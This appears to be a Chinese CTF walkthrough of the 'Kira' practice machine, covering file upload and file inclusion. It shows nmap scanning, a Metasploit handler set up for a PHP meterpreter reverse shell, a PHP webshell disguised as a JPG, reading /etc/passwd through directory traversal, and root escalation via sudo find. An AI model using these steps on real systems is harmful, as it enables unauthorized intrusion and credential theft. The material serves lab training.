Kira CTF靶机

简介: Kira CTF靶机

靶机等级:Low

技能考点:文件上传、文件包含漏洞

漏洞描述:当服务器开启allow_url_include选项时,就可以通过php的某些特性函数如include(),require()和include_once(),require_once(),利用url去动态包含文件,这时,如果文件名参数用户可控且没有做严格过滤,就导致任意文件读取或者任意命令执行(偷梁换柱)

0x01 信息收集

获取靶机IP地址


arp-scan -l

使用nmap 对靶机做积极的扫描


nmap -A 192.168.174.131


打开浏览器,访问靶机开放的HTTP(80)服务:


总结:

  • 靶机IP地址(192.168.174.131)
  • 开放的服务:HTTP(80)
  • 访问靶机开放的HTTP服务,发现存在一个上传入口


0x02 漏洞探测

思路:发现上传入口,尝试上传一个图片木马


1. 使用msfvenom生成图片木马

  • lhost,地址是攻击端地址

  • lport,端口是你攻击端监听端口


2. 打开 metasploit 监听

    use exploit/multi/handler #调用这个模块
    set payload php/meterpreter/reverse_tcp #设置payload
    set LHOST 192.168.174.177 #设置监听地址
    set LPORT 443 #设置监听端口
    exploit #利用


    3. 修改文件扩展名,上传图片木马

      mv shell.php webshell.jpg

      上传成功后,发现上传的路径:uploads/webshell.jpg


      4. 在初始的页面发现还有一个按钮

      0x03 拿到SHELL

      接下来,尝试读取我们的图片木马,我们先读取账户文件(/etc/passwd) 试试


      可是,当我们测试尝试读取文件的时候,发现读取不到这是为什么呢?


      我决定采取遍历目录的方式再尝试一下,果然读取到了


      接下来,读取我们的图片木马文件,返回 metasploit 可以看到,我们已经拿到一个会话

      1. 拿到shell后靶机信息收集

        uname -r              #查看内核版本信息
        uname -a              #查看系统信息
        cat /etc/passwd       #查看账户文件


        靶机系统是 Ubuntu 18.04 版本,在账户文件中发现了一个叫bassam的账户


        在靶机/var/www/html/ 目录下我们发现了一个可疑的目录


        进入后,发现了bassam账户的密码文件


        查看这个文件得到bassam密码Password123!@#


        切换到bassam 用户,可以看到成功切换到bassam用户


        好的,接下来进行提权


        0x04 提权

        如何提权呢?首先,我们看一下授权列表,发现find程序可以以root身份运行

          sudo -l


          那么,我们可以利用find来执行一个SHELL,提权成功


          至此,靶机提权完成!

          相关文章
          |
          3月前
          |
          开发框架 监控 Kubernetes
          CTF本地靶场搭建——GZ:CTF基础使用
          GZ::CTF是一个基于ASP.NET Core的开源CTF竞赛平台,支持Docker或K8s容器部署,提供静态和动态题目类型,包括静态附件、动态附件、静态容器和动态容器,具备动态分值功能,如三血奖励和动态flag作弊检测。平台还具有实时通知、邮件验证、用户权限管理、Writeup收集、流量代理转发等功能。此外,它包含比赛管理、队伍管理、用户管理等多个管理模块,适合举办和参与网络安全竞赛。
          |
          3月前
          |
          Ubuntu 网络安全 开发者
          CTF本地靶场搭建——GZ:CTF安装
          GZCTF是一个开源的网络安全竞技平台,由GZTimeWalker维护,提供环境供爱好者和专业人士通过解决CTF题目提升技能。本文档介绍了在Ubuntu 20.04上部署GZCTF的步骤,包括安装操作系统、配置清华镜像源、更新软件、安装Docker和docker-compose,以及根据GZCTF文档创建配置文件并启动服务。完成部署后,用户可在浏览器中看到GZCTF平台。
          |
          3月前
          |
          XML 存储 安全
          w1r3s 靶机学习
          w1r3s 靶机学习
          |
          安全 Oracle 关系型数据库
          看完这篇 教你玩转渗透测试靶机vulnhub——FunBox4(CTF)
          看完这篇 教你玩转渗透测试靶机vulnhub——FunBox4(CTF)
          220 1
          看完这篇 教你玩转渗透测试靶机vulnhub——FunBox4(CTF)
          |
          安全 Unix Shell
          CTF靶场练习
          翻了翻自己的文档,看见有一篇之前打CTF练习留下的文章,对文章做了修整,然后正文如下: 开始对目标进行了一波信息搜集,端口只开放了80端口,其他端口并不是很有帮助,不得不提nmap的协议识别功能非常好用,并且还自带扫目录的功能。
          159 0
          |
          安全 Shell Apache
          OSCP-CuteNews靶机攻防
          OSCP-CuteNews靶机攻防
          |
          SQL 安全 Shell
          FristiLeaks v1.3靶机渗透
          FristiLeaks v1.3靶机渗透
          |
          PHP
          pikachu靶场通关秘籍之文件包含攻击
          pikachu靶场通关秘籍之文件包含攻击
          105 0
          |
          安全 Oracle 关系型数据库
          看完这篇 教你玩转渗透测试靶机vulnhub——FunBox2(ROOKIE)
          看完这篇 教你玩转渗透测试靶机vulnhub——FunBox2(ROOKIE)
          212 1
          看完这篇 教你玩转渗透测试靶机vulnhub——FunBox2(ROOKIE)
          |
          安全 Oracle 关系型数据库
          看完这篇 教你玩转渗透测试靶机vulnhub——FunBox1
          看完这篇 教你玩转渗透测试靶机vulnhub——FunBox1
          215 1
          看完这篇 教你玩转渗透测试靶机vulnhub——FunBox1